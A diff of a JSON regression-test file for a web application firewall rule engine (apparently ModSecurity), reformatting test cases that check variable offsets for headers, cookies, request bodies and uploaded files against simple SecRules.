"error_log": "o0,9v89,9t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_HEADERS \"localhost\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, - - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_HEADERS:content-type", - "request":{ - "headers":{ + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_HEADERS:content-type", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { "Content-Length": "27", - "Host":"localhost", + "Host": "localhost", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o14,3v163,33t:trim" + "expected": { + "error_log": "o14,3v163,33t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_HEADERS \"www\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - AUTH_TYPE 1", - "request":{ - "headers":{ - "Host":"localhost", + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - AUTH_TYPE 1", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o0,5v162,5t:trim" + "expected": { + "error_log": "o0,5v162,5t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule AUTH_TYPE \"Basic\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - AUTH_TYPE 2", - "request":{ - "headers":{ + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - AUTH_TYPE 2", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==", - "Host":"localhost", + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o0,5v79,5t:trim" + "expected": { + "error_log": "o0,5v79,5t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule AUTH_TYPE \"Basic\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_HEADERS_NAMES", - "request":{ - "headers":{ + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_HEADERS_NAMES", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==", - "Host":"localhost", + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o0,4v64,13t:lowercase" + "expected": { + "error_log": "o0,4v64,13t:lowercase", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_HEADERS_NAMES \"auth\" \"id:1,phase:2,pass,t:lowercase,msg:'ops'\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_COOKIES 1", - "request":{ - "headers":{ + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_COOKIES 1", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==", - "Host":"localhost", + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", - "Cookie":"USER_TOKEN=Yes; a=z; t=b" + "Cookie": "USER_TOKEN=Yes; a=z; t=b" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o1,2v216,3t:lowercase" + "expected": { + "error_log": "o1,2v216,3t:lowercase", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_COOKIES \"es\" \"id:1,phase:2,pass,t:lowercase,msg:'ops'\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_COOKIES 2", - "request":{ - "headers":{ + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_COOKIES 2", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==", - "Host":"localhost", + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", - "Cookie":"USER_TOKEN=Yes; a=z; t=b" + "Cookie": "USER_TOKEN=Yes; a=z; t=b" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o0,1v223,1t:lowercase" + "expected": { + "error_log": "o0,1v223,1t:lowercase", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_COOKIES \"z\" \"id:1,phase:2,pass,t:lowercase,msg:'ops'\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_COOKIES 3", - "request":{ - "headers":{ + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_COOKIES 3", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==", - "Host":"localhost", + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", - "Cookie":"USER_TOKEN=Yes; a=z; t=b" + "Cookie": "USER_TOKEN=Yes; a=z; t=b" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o0,1v228,1t:lowercase,t:trim" + "expected": { + "error_log": "o0,1v228,1t:lowercase,t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_COOKIES \"b\" \"id:1,phase:2,pass,t:lowercase,t:trim,msg:'ops'\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_COOKIES_NAMES", - "request":{ - "headers":{ + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_COOKIES_NAMES", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==", - "Host":"localhost", + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", - "Cookie":"USER_TOKEN=Yes; a=z; t=b" + "Cookie": "USER_TOKEN=Yes; a=z; t=b" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o0,1v226,1" + "expected": { + "error_log": "o0,1v226,1", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_COOKIES_NAMES \"t\" \"id:1,phase:2,pass,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: REMOTE_USER", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"27", - "Content-Type":"application/x-www-form-urlencoded", + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables :: REMOTE_USER", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "27", + "Content-Type": "application/x-www-form-urlencoded", "Authorization": "Basic QWxhZGRpbjpPcGVuU2VzYW1l" }, - "uri":"/one/two/three?key1=value1&key2=v%20a%20l%20u%20e%202", - "method":"GET" + "uri": "/one/two/three?key1=value1&key2=v%20a%20l%20u%20e%202", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o0,7v198,30t:trim" + "expected": { + "error_log": "o0,7v198,30t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REMOTE_USER \"Aladdin\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: REQUEST_BODY", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables :: REQUEST_BODY", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", @@ -1002,38 +1328,47 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"o45,30v193,516t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o45,30v193,516t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_BODY \"Content-Disposition: form-data\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: REQUEST_BODY", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables :: REQUEST_BODY", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", @@ -1051,38 +1386,47 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"o45,30v193,516t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o45,30v193,516t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_BODY \"Content-Disposition: form-data\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: REQUEST_BODY_LENGTH", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables :: REQUEST_BODY_LENGTH", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", @@ -1100,38 +1444,47 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"v193,516t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "v193,516t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_BODY_LENGTH \"@gt 5\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: REQUEST_FILENAME 1", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/file?something else", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables :: REQUEST_FILENAME 1", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/file?something else", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", @@ -1149,38 +1502,47 @@ "----------------------------756b6d74fa1a8ee2--" ] }, - "expected":{ - "error_log":"o6,5v5,11t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o6,5v5,11t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_FILENAME \"/file\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: REQUEST_FILENAME 2", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20?something else", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables :: REQUEST_FILENAME 2", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20?something else", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", @@ -1198,38 +1560,47 @@ "----------------------------756b6d74fa1a8ee2--" ] }, - "expected":{ - "error_log":"o6,8v5,23t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o6,8v5,23t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_FILENAME \"/f i l e\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: REQUEST_FILENAME 3", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables :: REQUEST_FILENAME 3", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", @@ -1247,38 +1618,47 @@ "----------------------------756b6d74fa1a8ee2--" ] }, - "expected":{ - "error_log":"o6,8v5,23t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o6,8v5,23t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_FILENAME \"/f i l e\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: ARGS/Multipart 1", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables :: ARGS/Multipart 1", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", @@ -1296,38 +1676,47 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"o0,4v306,4t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o0,4v306,4t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS \"test\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: ARGS/Multipart 2", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables :: ARGS/Multipart 2", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", @@ -1349,38 +1738,47 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"o0,5v402,5t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o0,5v402,5t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS \"test2\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - FILES", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - FILES", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", @@ -1402,38 +1800,47 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"o0,16v680,20t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o0,16v680,20t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule FILES \"small_text_file2\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - FILES", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - FILES", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", @@ -1455,38 +1862,47 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"o0,16v512,20t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o0,16v512,20t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule FILES \"small_text_file1\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - FILES_NAMES", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - FILES_NAMES", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", @@ -1508,38 +1924,47 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"o0,8o0,8v491,8t:trimo0,16o0,16v709,16t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o0,8o0,8v491,8t:trimo0,16o0,16v709,16t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule FILES_NAMES \"(fiasdfasdfledata|filedata)\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - FILES_SIZES 1", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - 